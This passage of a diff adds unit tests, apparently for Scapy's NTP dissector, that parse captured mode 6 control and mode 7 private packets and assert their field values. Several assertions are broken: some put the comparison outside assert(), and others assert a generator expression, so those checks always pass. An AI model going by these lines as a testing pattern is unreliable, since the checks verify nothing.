+assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 1) +assert(p.op_code == 2) +assert(p.sequence == 18) +assert(isinstance(p.status_word, NTPPeerStatusPacket)) +assert(p.status_word.configured == 1) +assert(p.status_word.auth_enabled == 1) +assert(p.status_word.authentic == 0) +assert(p.status_word.reachability == 0) +assert(p.status_word.peer_sel == 0) +assert(p.status_word.peer_event_counter == 1) +assert(p.status_word.peer_event_code == 1) +assert(p.association_id == 64655) +assert(p.offset == 0) +assert(p.count == 468) +assert(p.data.load == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ') + + += NTP Control (mode 6) - CTL_OP_READVAR (3) - response (2nd packet) +s = b'\xd6\x82\x00\x12\xc0\x11\xfc\x8f\x01\xd4\x00i0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 2) +assert(p.sequence == 18) +assert(isinstance(p.status_word, NTPPeerStatusPacket)) +assert(p.association_id == 64655) +assert(p.offset == 468) +assert(p.count == 105) +assert(p.data.load == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00') + + += NTP Control (mode 6) - CTL_OP_READVAR (4) - request +s = b'\x16\x02\x00\x13\x00\x00s\xb5\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01=\xc2;\xc7\xed\xb9US9\xd6\x89\x08\xc8\xaf\xa6\x12' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 2) +assert(len(p.data.load) == 12) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'3dc23bc7edb9555339d68908c8afa612') + + += NTP Control (mode 6) - CTL_OP_READVAR (5) - response +s = b'\xd6\xc2\x00\x13\x05\x00s\xb5\x00\x00\x00\x00\x00\x00\x00\x01\x97(\x02I\xdb\xa0s8\xedr(`\xdbJX\n' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 1) +assert(p.more == 0) +assert(p.op_code == 2) +assert(len(p.data.load) == 0) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'97280249dba07338ed722860db4a580a') + + += NTP Control (mode 6) - CTL_OP_WRITEVAR (1) - request +s = b'\x16\x03\x00\x11\x00\x00\x00\x00\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01\xaf\xf1\x0c\xb4\xc9\x94m\xfcM\x90\tJ\xa1p\x94J' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 3) +assert(len(p.data.load) == 12) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'aff10cb4c9946dfc4d90094aa170944a') + + += NTP Control (mode 6) - CTL_OP_WRITEVAR (2) - response +s = b'\xd6\xc3\x00\x11\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80z\x80\xfb\xaf\xc4pg\x98S\xa8\xe5xe\x81\x1c' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 1) +assert(p.more == 0) +assert(p.op_code == 3) +assert(hasattr(p, 'status_word')) +assert(isinstance(p.status_word, NTPErrorStatusPacket)) +assert(p.status_word.error_code == 5) +assert(len(p.data.load) == 0) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c') + + += NTP Control (mode 6) - CTL_OP_CONFIGURE (1) - request +s = b'\x16\x08\x00\x16\x00\x00\x00\x00\x00\x00\x00\x0ccontrolkey 1\x00\x00\x00\x01\xea\xa7\xac\xa8\x1bj\x9c\xdbX\xe1S\r6\xfb\xef\xa4' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 8) +assert(p.count == 12) +assert(p.data.load == b'controlkey 1') +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'eaa7aca81b6a9cdb58e1530d36fbefa4') + + += NTP Control (mode 6) - CTL_OP_CONFIGURE (2) - response +s = b'\xd6\x88\x00\x16\x00\x00\x00\x00\x00\x00\x00\x12Config Succeeded\r\n\x00\x00\x00\x00\x00\x01\xbf\xa6\xd8_\xf9m\x1e2l)<\xac\xee\xc2\xa59' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 8) +assert(p.count == 18) +assert(p.data.load == b'Config Succeeded\r\n\x00\x00') +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'bfa6d85ff96d1e326c293caceec2a539') + + += NTP Control (mode 6) - CTL_OP_SAVECONFIG (1) - request +s = b'\x16\t\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x0fntp.test.2.conf\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc9\xfb\x8a\xbe<`_\xfa6\xd2\x18\xc3\xb7d\x89#' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 9) +assert(p.count == 15) +assert(p.data.load == b'ntp.test.2.conf\x00') +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'c9fb8abe3c605ffa36d218c3b7648923') + + += NTP Control (mode 6) - CTL_OP_SAVECONFIG (2) - response +s = b"\xd6\x89\x00\x1d\x00\x00\x00\x00\x00\x00\x00*Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00\x00\x00\x00\x012\xc2\xbaY\xc53\xfe(\xf5P\xe5\xa0\x86\x02\x95\xd9" +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 9) +assert(p.count == 42) +assert(p.data.load == b"Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00") +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'32c2ba59c533fe28f550e5a0860295d9') + + += NTP Control (mode 6) - CTL_OP_REQ_NONCE (1) - request +s = b'\x16\x0c\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 12) +assert(p.data == b'') +assert(p.authenticator == b'') + + += NTP Control (mode 6) - CTL_OP_REQ_NONCE (2) - response +s = b'\xd6\x8c\x00\x07\x00\x00\x00\x00\x00\x00\x00 nonce=db4186a2e1d9022472e24bc9\r\n' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 12) +assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n') +assert(p.authenticator == b'') + + += NTP Control (mode 6) - CTL_OP_READ_MRU (1) - request +s = b'\x16\n\x00\x08\x00\x00\x00\x00\x00\x00\x00(nonce=db4186a2e1d9022472e24bc9, frags=32' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.op_code == 10) +assert(p.count == 40) +assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32') +assert(p.authenticator == b'') + += NTP Control (mode 6) - CTL_OP_READ_MRU (2) - response +s = b'\xd6\x8a\x00\x08\x00\x00\x00\x00\x00\x00\x00\xe9nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.op_code == 10) +assert(p.count == 233) +assert(p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00') +assert(p.authenticator == b'') + + +############ +############ ++ NTP Private (mode 7) tests + += NTP Private (mode 7) - error - Dissection +s = b'\x97\x00\x03\x1d@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 29) +assert(p.err == 4) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_PEER_LIST (1) - request +s = b'\x17\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 0) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_PEER_LIST (2) - response +s = b'\x97\x00\x03\x00\x00\x01\x00 \x7f\x7f\x01\x00\x00{\x03\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 0) +assert(p.nb_items == 1) +assert(p.data_item_size == 32) +assert(type(p.data[0]) == NTPInfoPeerList) +assert(p.data[0].addr) == "127.127.1.0" +assert(p.data[0].port) == 123 + + += NTP Private (mode 7) - REQ_PEER_INFO (1) - request +s = b'\x17\x00\x03\x02\x00\x01\x00 \xc0\xa8zf\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 2) +assert(p.nb_items == 1) +assert(p.data_item_size == 32) +assert(isinstance(p.req_data[0], NTPInfoPeerList)) +assert(p.req_data[0].addr == "192.168.122.102") +assert(p.req_data[0].port == 123) + + += NTP Private (mode 7) - REQ_PEER_INFO (2) - response +s = b'\x97\x00\x03\x02\x00\x01\x01\x18\xc0\xa8zf\xc0\xa8ze\x00{\x01\x03\x01\x00\x10\x06\n\xea\x04\x00\x00\xaf"\x00"\x16\x04\xb3\x01\x00\x00\x00\x00\x00\x00\x00INIT\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x82\x9d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb<\x8d\xc5\xde\x7fB\x89\xdb<\x8d\xc5\xde\x7fB\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 2) +assert(isinstance(p.data[0], NTPInfoPeer)) +assert(p.data[0].dstaddr == "192.168.122.102") +assert(p.data[0].srcaddr == "192.168.122.101") +assert(p.data[0].srcport == 123) +assert(p.data[0].associd == 1203) +assert(p.data[0].keyid == 1) + + += NTP Private (mode 7) - REQ_PEER_LIST_SUM (1) - request +s = b'\x17\x00\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 1) + + += NTP Private (mode 7) - REQ_PEER_LIST_SUM (2) - response (1st packet) +s = b'\xd7\x00\x03\x01\x00\x06\x00H\n\x00\x02\x0f\xc0\x00\x02\x01\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\x00\x02\x02\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x01\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x02\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\n\x00\x02\x0f\xc0\xa8d\r\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zf\x00{\x0b\x06\x07\xf4\x83\x01\x00\x00\x07\x89\x00\x00\x00\x007\xb1\x00h\x00\x00o?\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 1) +assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert(p.data[0].srcaddr == "192.0.2.1") + + += NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (2nd packet) +s = b'\xd7\x01\x03\x01\x00\x06\x00H\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x11\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zh\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zi\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8ze\xc0\xa8zj\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zk\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) + +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 1) +assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert(p.data[0].srcaddr == "192.168.122.103") + + += NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (3rd packet) +s = b'\x97\x02\x03\x01\x00\x02\x00H\xc0\xa8ze\xc0\xa8zl\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zm\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) + +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 1) +assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert(p.data[0].srcaddr == "192.168.122.108") + + += NTP Private (mode 7) - REQ_PEER_STATS (1) - request +s = b'\x17\x00\x03\x03\x00\x01\x00 \xc0\xa8ze\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 3) +assert(isinstance(p.req_data[0], NTPInfoPeerList)) + + += NTP Private (mode 7) - REQ_PEER_STATS (2) - response +s = b'\x97\x00\x03\x03\x00\x01\x00x\xc0\xa8zf\xc0\xa8ze\x00{\x00\x01\x01\x00\x10\x06\x00\x00\x00)\x00\x00\x00\x1e\x00\x02\xda|\x00\x00\x00\xbc\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) + +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 3) +assert(isinstance(x, NTPInfoPeerStats) for x in p.data) + + += NTP Private (mode 7) - REQ_SYS_INFO (1) - request +s = b'\x17\x00\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) + +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 4) + + += NTP Private (mode 7) - REQ_SYS_INFO (2) - response +s = b'\x97\x00\x03\x04\x00\x01\x00P\x7f\x7f\x01\x00\x03\x00\x0b\xf0\x00\x00\x00\x00\x00\x00\x03\x06\x7f\x7f\x01\x00\xdb<\xca\xf3\xa1\x92\xe1\xf7\x06\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5' +p = NTP(s) + +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 4) +assert(isinstance(p.data[0], NTPInfoSys)) +assert(p.data[0].peer == "127.127.1.0") +assert(p.data[0].peer_mode == 3) +assert(p.data[0].leap == 0) +assert(p.data[0].stratum == 11) +assert(p.data[0].precision == 240) +assert(p.data[0].refid == "127.127.1.0") + + += NTP Private (mode 7) - REQ_SYS_STATS (1) - request +s = 